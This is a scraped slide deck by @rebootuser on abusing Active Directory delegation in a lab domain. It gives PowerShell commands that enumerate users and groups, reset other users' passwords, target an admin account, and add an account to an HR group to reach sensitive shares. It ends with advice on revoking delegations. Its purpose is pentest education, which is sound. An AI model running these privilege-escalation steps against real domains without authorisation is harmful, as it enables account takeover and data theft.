![“…Active Directory delegation is critical part of many
organisations' IT infrastructure. By delegating administration,
you can grant users or groups only the permissions they need
without adding users to privileged groups (e.g., Domain
Admins, Account Operators)…”*
* [source] http://windowsitpro.com/active-directory/view-remove-ad-delegated-permissions
AD Dele-What?](https://image.slidesharecdn.com/camsecaddelegation2-170130194236/85/Active-Directory-Delegation-By-rebootuser-2-320.jpg)
![AdminSDHolder & SDProp
• AdminSDHolder is a container that exists in
each AD domain
• A protected group is an Active Directory group
that is identified as a privileged group. This
group and all its members should be protected
from unintentional modifications*
• When an AD group is marked a protected
group; AD will ensure that the owner, the ACLs
and the inheritance applied on this group are
the same as the ones applied on
AdminSDHolder container*
* [source] https://social.technet.microsoft.com/wiki/contents/articles/22331.adminsdholder-protected-groups-and-security-descriptor-propagator.aspx](https://image.slidesharecdn.com/camsecaddelegation2-170130194236/85/Active-Directory-Delegation-By-rebootuser-21-320.jpg)
Active Directory Delegation - By @rebootuser
- 3. Requirements • Windows Remote Administration Toolkit https://www.microsoft.com/en-gb/download/details.aspx?id=45520 • Windows attacking host with Admin Privileges • Patience and Enumeration Skills!
- 4. AD PowerShell Cmdlets • Import the AD PowerShell module on the attacking host • The attack box isn’t part of the victim domain, so the AD drive cannot load $Env:ADPS_LoadDefaultDrive = 0 Import-Module ActiveDirectory
- 5. LDAP Overview Terminology • CN = Common Name • OU = Organizational Unit • DC = Domain Component CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC =rebootuser,DC=local
- 7. Enumeration Get-ADDomain -Server 192.168.99.100 -Credential "rebootuserbob” Redacted Output: DistinguishedName : DC=rebootuser,DC=local DNSRoot : rebootuser.local DomainMode : Windows2012Domain DomainSID : S-1-5-21-3305272636-1761470839-3168806703 Forest : rebootuser.local InfrastructureMaster : DC-01.rebootuser.local: NetBIOSName : REBOOTUSER PDCEmulator : DC-01.rebootuser.local RIDMaster : DC-01.rebootuser.local SystemsContainer : CN=System,DC=rebootuser,DC=local UsersContainer : CN=Users,DC=rebootuser,DC=local
- 9. Account Enumeration Get-ADUser -Identity "bob" -server 192.168.99.100 -Credential "rebootuserbob" -properties * Redacted Output: DistinguishedName : CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=l ocal Description : 1st Line Support HomeDirectory : DC-01Share$HomeBob
- 11. Enumeration is Slow…. $username = "rebootuserbob" $password = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force $cred = new-object -typename System.Management.Automation.PSCredential - argumentlist $username, $password $diname = Get-ADOrganizationalUnit -Filter * -SearchBase "dc=rebootuser,dc=local" -Properties canonicalname -server 192.168.99.100 - Credential $cred | select distinguishedname; foreach ($i in $diname) {write-output $i.distinguishedname; Get-ADUser -SearchBase $i.distinguishedname -Filter * -Searchscope onelevel -server 192.168.99.100 -Credential $cred | Format-List SamAccountName}
- 12. Enumeration is Slow…. OU=Sales,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : sue OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : bob SamAccountName : jeff OU=Management,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : tim OU=Marketing,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : jimmy OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local SamAccountName : godmode OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local SamAccountName : sally
- 15. Exercise We’ve identified 2 groups: • it_support_limited (some delegated rights) and • it_support_priv (many delegated rights) Questions to ask : • Users that have membership of either group
- 16. Group Memberships Get-ADGroupMember -Identity "it_support_limited" -server 192.168.99.100 - Credential "rebootuserbob" | select ObjectClass, SamAccountName Get-ADGroupMember -Identity "it_support_priv" -server 192.168.99.100 - Credential "rebootuserbob" | select ObjectClass, SamAccountName
- 18. Abuse of Privilege… • Looking at the previous enumeration results we see that Jeff is also in the support OU OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : bob SamAccountName : jeff • Let's change his password! Set-ADAccountPassword 'cn=jeff,ou=support,ou=users,ou=cambridge,ou=uk,ou=offices,dc=rebootuser,dc =local' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "P@ssw0rd" -Force) -Server 192.168.99.100 -Credential "rebootuserbob" To cut a long story (and many, many more slides of enumeration) IT_support_limited has password reset rights over the UK OU and child entities and IT_support_priv has all possible delegation rights over the entire Offices OU and child entities
- 20. PWN all the Admins! • From earlier recon we found an interesting user, godmode: OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local • Which groups is godmode a member: Get-ADPrincipalGroupMembership godmode -Server 192.168.99.100 -Credential "rebootuserjeff" | select name • Ah, excellent Jeff has delegation rights here, lets change the password….
- 21. AdminSDHolder & SDProp • AdminSDHolder is a container that exists in each AD domain • A protected group is an Active Directory group that is identified as a privileged group. This group and all its members should be protected from unintentional modifications* • When an AD group is marked a protected group; AD will ensure that the owner, the ACLs and the inheritance applied on this group are the same as the ones applied on AdminSDHolder container* * [source] https://social.technet.microsoft.com/wiki/contents/articles/22331.adminsdholder-protected-groups-and-security-descriptor-propagator.aspx
- 22. AdminSDHolder – Who/What/Eh? Get-ADGroup -LDAPFilter "(admincount=1)" -Server 192.168.99.100 -Credential "rebootuserjeff" | Select SamAccountName Get-ADUser -LDAPFilter "(admincount=1)" -Server 192.168.99.100 -Credential "rebootuserjeff" | Select SamAccountName
- 23. Needing Direction • So where do we go from here? • We have powerful delegation rights – we can change passwords, modify group memberships, add groups/user etc. • DA is not necessarily the end goal • Sensitive data is likely to be stored in group drives: • If we recall, Bobs home directory resides in the following location: HomeDirectory : DC-01Share$HomeBob • HR • Finance • IT • Management • …the list goes on
- 25. Group Enumeration • Automated group enumeration – I won’t bore you with the PS query! OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local SamAccountName : IT_support_limited SamAccountName : IT_support_priv SamAccountName : it_users SamAccountName : the_privileged_few OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local SamAccountName : hr_users • We (Jeff) have delegation rights here - let's add ourselves (bob) to this group!
- 27. Final Thoughts • Complex environments could easily faultier in delegation assignments • Microsoft provide a nice wizard interface for assigning permissions… ….revoking permissions is not such a straight forward approach • Often overlooked in pentests, but a prime target! • Dsrevoke • PowerShell • ADUC > Advanced View > Security Tab